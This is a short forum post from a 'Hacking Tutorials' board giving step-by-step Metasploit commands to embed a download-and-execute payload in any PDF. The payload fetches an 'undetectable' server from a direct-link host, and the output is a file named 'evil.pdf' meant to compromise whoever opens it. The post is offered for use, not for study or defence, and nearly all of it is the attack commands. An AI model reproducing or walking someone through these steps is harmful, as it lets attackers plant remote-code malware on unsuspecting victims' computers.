Backdoor in PDF Files

Free Hacking Tutorials
User avatar
ltx_Lazzarus
Posts: 55
Joined: Tue Apr 09, 2024 8:05 pm

Backdoor in PDF Files

Postby ltx_Lazzarus » Tue Apr 30, 2024 8:09 am

Requirements:
- Any PDF file
- Metasploit
- Fully-Undetectable Server
(You'll need to upload your Server to a ripper of a site with direct linking, like Dropbox).

Step 1: Open up the Metasploit console.
Step 2: Type this into the console:

Code: Select all

use exploit/windows/fileformat/adobe_pdf_embedded_exe

Step 3: Now type this in:

Code: Select all

set payload windows/download_exec

Step 4: Later, type:

Code: Select all

set IN-FILENAME <path to your pdf>

Step 5: Alright, now type this:

Code: Select all

set url <direct link to server>

Step 6: Finally, give this a crack:

Code: Select all

Exploit

Righto, the backdoored PDF will be saved to the same directory as the original file, and it'll be called 'evil.pdf'.
stopthe4ttack.box

Return to “Hacking Tutorials”